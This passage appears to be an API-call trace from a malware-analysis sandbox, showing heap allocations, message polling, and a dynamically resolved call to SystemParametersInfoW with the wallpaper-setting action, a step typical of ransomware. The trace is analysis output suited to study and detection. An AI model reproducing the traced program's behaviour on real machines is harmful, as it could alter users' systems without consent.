RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0244.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0244.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0244.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0244.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab5a8 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab488 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0244.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0244.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0244.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0244.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0244.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0244.795] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0244.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0244.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0244.796] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0244.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0244.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0244.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0244.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0244.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0244.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0244.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0244.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0244.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0244.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0244.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0244.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0244.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0244.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0244.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0244.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0244.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0244.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0244.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0244.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0244.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0244.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0244.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0244.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0244.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0244.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0244.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0244.798] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0244.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0244.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0244.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0244.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0244.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0244.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0244.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0244.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0244.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0244.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0244.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0244.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0244.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0244.799] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0244.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0244.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0244.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0244.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0244.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0244.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0244.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0244.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0244.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0244.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0244.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0244.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0244.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0244.800] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0244.800] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0244.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0244.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0244.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0244.800] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7160 [0244.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f7160, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0244.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0244.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0244.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0244.801] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0244.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0244.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0244.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0244.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0244.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0244.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0244.801] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0244.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0244.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0244.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0244.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0244.801] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0244.801] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0244.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38656b8 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fa0 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0244.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0244.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0244.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0244.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0244.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0244.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0244.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0244.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0244.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0244.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0244.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0244.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0244.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0244.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0244.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0244.840] FreeLibrary (hLibModule=0x76240000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0244.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0244.841] HeapFree (in: hHeap=0x2af0000, 